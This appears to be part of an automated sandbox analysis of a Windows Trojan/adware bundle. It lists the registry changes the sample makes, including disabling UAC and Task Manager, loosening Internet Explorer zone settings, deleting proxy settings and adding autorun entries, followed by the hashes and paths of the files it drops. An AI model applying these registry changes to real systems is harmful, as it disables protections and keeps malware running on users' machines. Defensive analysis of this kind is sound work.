[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process runonce.exe:3520 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE A7 6E E3 6F 15 05 2D 46 B7 1B F2 62 FA 5F EC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"grpconv.exe" = "Windows Progman Group Converter"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:


The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"

The process cvtres.exe:308 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB BC 73 17 9B FC 38 20 B9 C5 7F EC 00 EB F2 DE"

The process cvtres.exe:1968 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 AD 4A A3 BC 16 4C A8 7D 79 1D D2 F0 C5 01 FB"

The process cvtres.exe:1556 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 72 98 CA C6 12 F5 02 D8 A6 F6 9D 5A 96 0B 1C"

The process cvtres.exe:952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 FD 18 0D 51 E0 A0 35 12 A6 4F 24 C0 5D DF 7E"

The process cvtres.exe:1064 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 D2 D2 DC 4B 60 E6 26 1E 29 8E 35 32 67 69 1B"

The process cvtres.exe:340 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0D 46 7A F5 1D BD 3B 99 0F 29 F5 E3 80 85 D8"

The process cvtres.exe:164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6B 75 2A 6B C1 0D 17 F2 2F B2 F5 85 7B 50 43"

The process cvtres.exe:504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D3 5E 87 47 30 4E 42 C5 1D A0 D1 DC 6A 45 B3"

The process cvtres.exe:364 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 11 D1 C4 63 2E C0 4D DE 2C 7C 39 47 EC 15 5D"

The process Osman_Navigation.exe:4072 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"DisplayVersion" = "2.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"UninstallString" = "%Program Files%\FrivLauncher\uninst.exe"

[HKLM\SOFTWARE\Reltek]
"channel" = "egg7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 81 51 83 26 17 CC 23 93 E1 47 CA 29 DC AA 9D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"DisplayName" = "FrivLauncher 2.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\FrivLauncher.exe]
"(Default)" = "%Program Files%\FrivLauncher\FrivLauncher.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Reltek]
"LangID" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"Publisher" = "Friv Launcher"
"DisplayIcon" = "%Program Files%\FrivLauncher\FrivLauncher.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"

The process PSSetupNativeUtils.exe:968 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD B5 3C 3C 58 DB F4 A8 01 1B D6 81 E6 8A 15"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process mastermind.exe:3740 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\BrowserEmulation]
"DisableSiteListEditing" = "1"

[HKLM\SOFTWARE\master]
"InstalledTime" = "2016-5-12 0:18:21"

[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"WarnOnClose" = "0"

[HKCU\Software\master]
"ApplicationPath" = "%Documents and Settings%\%current user%\Application Data\master"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\master]
"InstalledVersion" = "1.00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0]
"(Default)" = "MiamiReportsLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1400" = "0"

[HKLM\SOFTWARE\master]
"ApplicationPath" = "%Documents and Settings%\%current user%\Application Data\master"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1409" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1400" = "0"

[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1609" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"

[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"Enabled" = "1"

[HKCU\Software\master]
"Macaddress" = "00-0C-29-5C-94-64"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1409" = "3"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Safety\PrivacIE]
"DisableToolbars" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2]
"1609" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"DisableTaskMgr" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\master]
"Macaddress" = "00-0C-29-5C-94-64"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\master\masterReports.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1]
"1609" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 42 37 BA E3 A6 E0 E6 92 41 23 9F 4B 19 9F 90"

[HKCU\Software\master]
"InstalledTime" = "2016-5-12 0:18:21"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1409" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext]
"DisableAddonLoadTimePerformanceNotifications" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\master"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1400" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1409" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1609" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\CommandBar]
"ShowCompatibilityViewButton" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Task Manager is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"

User account control (UAC) is disabled:

"EnableLUA" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process hwopt12052016001648.exe:912 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 2F 7B 95 FF 71 EA 0B 36 72 C4 FF 25 79 5E 44"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER], NetworkAnalyser[APP_SETTINGS], hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\Service1]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[ADWARE_ROI]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

The process grpconv.exe:3484 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 83 16 AA 74 E1 04 08 10 AA D3 69 69 82 F1 5B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\GrpConv]
"Log" = "Init Application."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\MSProgramGroup\Shell\Open\Command]
"(Default)" = "%System%\grpconv.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCR\MSProgramGroup]
"(Default)" = "Microsoft Program Group"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.grp]
"(Default)" = "MSProgramGroup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
883eff06ac96966270731e4e22817e11c:\Documents and Settings\"%CurrentUserName%"\Application Data\System.dll
0ee8bfa743945490372677428d83fb13c:\Documents and Settings\"%CurrentUserName%"\Application Data\septillions.dll
115022aa231b4a3daed5aa590ff5e38cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\obuwa\obuwa.exe
9859a26d5e72bbb0685af813b409d99dc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
d53d3f1be1b0b4d3763058da5afb8ba2c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe
7ae6a446e35a1e199856cb91c797e6f4c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\NActions.dll
adb29e6b186daa765dc750128649b63dc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\UAC.dll
2f672971373f9826ad77db6a21e39e18c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe
a39df582ca051afc8811fbd00db12f10c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll
cbc4d01bc7af8ebf41b96518793f3238c:\WINDOWS\hwopt_12052016001648\InstallUtil.exe
83d51ff1c826da99ebf87b02dd0cc744c:\WINDOWS\hwopt_12052016001648\InstallationStatsUploder_12052016001648.exe
4288ea76d5ea9ca5146492d4bf25a743c:\WINDOWS\hwopt_12052016001648\NetworkUtil.dll
b3ebc63dbc6c7ffadfaff309274da226c:\WINDOWS\hwopt_12052016001648\Newtonsoft.Json.dll
3c4e4db1f4a657592800fd5e0db4e405c:\WINDOWS\hwopt_12052016001648\Utils.dll
7d071297b9c9915e1a9176930ffbbfcbc:\WINDOWS\hwopt_12052016001648\WinDivert.dll
b3c1811331f3906b74a6d926ddff806dc:\WINDOWS\hwopt_12052016001648\WinDivert32.sys
7d071297b9c9915e1a9176930ffbbfcbc:\WINDOWS\hwopt_12052016001648\addon\WinDivert.dll
b3c1811331f3906b74a6d926ddff806dc:\WINDOWS\hwopt_12052016001648\addon\WinDivert32.sys
315d47153122903c52051b7027988f85c:\WINDOWS\hwopt_12052016001648\addon\atl110.dll
bf38660a9125935658cfa3e53fdc7d65c:\WINDOWS\hwopt_12052016001648\addon\msvcr100.dll
4ba25d2cbe1587a841dcfb8c8c4a6ea6c:\WINDOWS\hwopt_12052016001648\addon\msvcr110.dll
034ccadc1c073e4216e9466b720f9849c:\WINDOWS\hwopt_12052016001648\addon\msvcr120.dll
f67ca8d338dfd99e3c540336221f8fa7c:\WINDOWS\hwopt_12052016001648\addon\msvcr120d.dll
5598b73b9f8b3740d094949cc8dcd818c:\WINDOWS\hwopt_12052016001648\addon\netman.exe
0c6b43c9602f4d5ac9dcf907103447c4c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\certutil.exe
269beb631b580c6d54db45b5573b1de5c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\freebl3.dll
6e84af2875700285309dd29294365c6ac:\WINDOWS\hwopt_12052016001648\addon\nss_tools\libnspr4.dll
1fae68b740f18290b98b2f9e23313cc2c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\libplc4.dll
9ae76db13972553a5de5bdd07b1b654dc:\WINDOWS\hwopt_12052016001648\addon\nss_tools\libplds4.dll
bf38660a9125935658cfa3e53fdc7d65c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\msvcr100.dll
4ba25d2cbe1587a841dcfb8c8c4a6ea6c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\msvcr110.dll
a1c4628d184b6ab25550b1ce74f44792c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nss3.dll
d1243817a1b22b855de0852cf5b53bf5c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nssckbi.dll
051652ba7ca426846e936bc5aa3f39f3c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nssdbm3.dll
c26e940b474728e728cafe5912ba418ac:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nssutil3.dll
a5c670edf4411bf7f132f4280026137bc:\WINDOWS\hwopt_12052016001648\addon\nss_tools\smime3.dll
2ab31c9401870adb4e9d88b5a6837abfc:\WINDOWS\hwopt_12052016001648\addon\nss_tools\softokn3.dll
b58848a28a1efb85677e344db1fd67e6c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\sqlite3.dll
717dbdf0e1f616ea8a038259e273c530c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\ssl3.dll
bc76279451a61052d34f203479c6a9bec:\WINDOWS\hwopt_12052016001648\hwopt12052016001648.exe
d0052d33941cc8d6e2c471ed75a61906c:\WINDOWS\hwopt_12052016001648\hwopt12052016001648_updater_service.exe
3e29914113ec4b968ba5eb1f6d194a0ac:\WINDOWS\hwopt_12052016001648\msvcp110.dll
4ba25d2cbe1587a841dcfb8c8c4a6ea6c:\WINDOWS\hwopt_12052016001648\msvcr110.dll
942895f3bdc894f8e498c5f7d0ab47aec:\WINDOWS\hwopt_12052016001648\unins000.exe
df4217ddb34a0b73dc7aac7829371c0cc:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
